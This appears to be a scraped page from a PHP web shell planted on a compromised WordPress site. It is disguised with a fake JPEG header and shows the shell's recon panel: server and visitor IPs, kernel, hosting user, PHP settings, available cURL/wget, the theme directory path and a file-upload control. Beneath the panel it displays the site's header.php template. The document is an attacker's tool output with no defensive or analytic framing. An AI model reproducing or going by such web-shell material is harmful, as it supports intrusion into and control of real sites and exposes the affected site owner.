���� JFIF fdasasfas213sdaf
Server IP : 88.222.243.169 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/essartindia.com/public_html/wp-content/themes/woodmart/ |
Upload File : |
<?php /** * The Header template for our theme */ ?><!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>"> <?php wp_head(); ?> <meta name="google-site-verification" content="aPHzA7e99EiHbygHMghD5dFf86oxjsiS61sDXB1HsCA" /> </head> <body <?php body_class(); ?>> <?php if ( function_exists( 'wp_body_open' ) ) : ?> <?php wp_body_open(); ?> <?php endif; ?> <?php do_action( 'woodmart_after_body_open' ); ?> <div class="website-wrapper"> <?php if ( woodmart_needs_header() ) : ?> <?php if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'header' ) ) : ?> <header <?php woodmart_get_header_classes(); // phpcs:ignore ?>> <?php whb_generate_header(); ?> </header> <?php endif ?> <?php woodmart_page_top_part(); ?> <?php endif ?>